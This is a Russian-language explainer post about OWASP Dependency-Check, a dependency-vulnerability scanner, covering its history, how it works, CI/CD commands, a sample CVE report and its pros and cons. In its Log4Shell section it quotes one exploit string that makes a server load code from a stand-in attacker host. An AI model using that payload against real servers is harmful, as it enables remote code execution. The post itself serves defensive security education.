Кратко: Dependency-Check — это инструмент от OWASP, который сканирует ваши проекты на наличие уязвимых библиотек. Вы подключаете его к CI/CD, он анализирует зависимости (JAR, NPM, NuGet, PIP) и сверяет их с базой известных уязвимостей (NVD — National Vulnerability Database) . Если находит CVE с высоким рейтингом — пайплайн падает, и код не улетает в прод. Создан в 2012 году, сегодня используется в тысячах компаний как бесплатная альтернатива Snyk и WhiteSource.

▫️ Как дошли до жизни такой 2012 год. Стив Спрингетт (Steve Springett) начинает проект OWASP Dependency-Check. Основная идея: разработчики не следят за уязвимостями в сторонних библиотеках, а хакеры — следят. Log4Shell (2021) показал это наглядно: миллионы приложений использовали уязвимую версию Log4j, потому что никто не проверял зависимости. В 2012-м Dependency-Check умел только Java (JAR, WAR, EAR). Со временем добавились: JavaScript (NPM, Yarn), Python (pip, requirements.txt), .NET (NuGet), Ruby (Gems), PHP (Composer), Go (mod) и даже Docker-образы . Сегодня Dependency-Check — это стандарт для CI/CD в мире open-source и небольших компаний.

▫️ Как работает (без магии) 1. Сбор данных: Инструмент парсит все файлы зависимостей в проекте (pom.xml, package.json, requirements.txt, build.gradle, Dockerfile, .csproj) . 2. Запрос к NVD: Dependency-Check подключается к NVD (National Vulnerability Database) — глобальной базе CVE, которую ведёт NIST (США). Спрашивает: «Какие CVE есть для библиотеки log4j-core 2.14.1?». База NVD обновляется ежедневно . 3. Анализ: Сравнивает версии библиотек с загруженным списком уязвимостей. Для некоторых типов (JavaScript) проверяет хеши файлов, если в NVD нет точного совпадения по версии. 4. Отчёт: Выводит список найденных CVE с уровнями критичности (CVSS Score 0–10) и ссылками на описание .

▫️ Интеграция в CI/CD (примеры) Maven (pom.xml) mvn org.owasp:dependency-check-maven:check

Jenkins + GitHub Actions - name: OWASP Dependency Check run: dependency-check --scan ./ --format HTML --out report.html

Jenkins с плагином · Установить плагин OWASP Dependency-Check · Добавить шаг сборки: сканирование путей к проекту · Настроить порог критичности (остановить сборку при CVE >= 7.0)

▫️ Пример отчёта (реальный) После сканирования Dependency-Check генерирует HTML-файл с таблицей: Библиотека Версия CVE CVSS Описание log4j-core 2.14.1 CVE-2021-44228 10.0 Log4Shell RCE jackson-databind 2.9.8 CVE-2019-12384 8.1 XXE, RCE lodash 4.17.15 CVE-2019-10744 7.5 Prototype pollution Каждая строка содержит ссылку на CVE, описание уязвимости и рекомендацию по версии для обновления .

▫️ Плюсы и минусы Плюсы: · Бесплатно, open-source · Поддерживает все популярные экосистемы (Java, NPM, Python, .NET, Go, Ruby, PHP, Docker) · Интегрируется в Jenkins, GitHub Actions, GitLab CI · Обновляемая база NVD

Минусы: · Медленный: Сканирование большого проекта может занимать 10–30 минут · Ложные срабатывания: Может путать версии библиотек в сложных монорепозиториях · Устаревшая база: NVD иногда обновляется с задержкой в дни после публикации CVE · Нет коммерческой поддержки (в отличие от Snyk или Sonatype)

▫️ Культурный феномен Log4Shell (декабрь 2021) — самый громкий CVE в истории (CVSS 10.0). Уязвимость в библиотеке логирования Apache Log4j 2.x, позволяющая выполнить код на сервере через специальную строку ${jndi:ldap://evil.com/exploit}. После этого инцидента Dependency-Check стал обязательным инструментом во многих пайплайнах. Если бы компании сканировали свои зависимости перед релизом, миллионы серверов не были бы скомпрометированы .

Главный вывод: Dependency-Check — это бесплатный сканер, который стоит внедрить в CI/CD в первую неделю работы над любым проектом, особенно если вы используете open-source библиотеки. Он не панацея, но ловит 80% известных дыр. Дополняйте его Snyk для мониторинга в реальном времени и анализом лицензий.

#dependencycheck #owasp #devsecops #sca #log4shell #cve #инфобез #ci_cd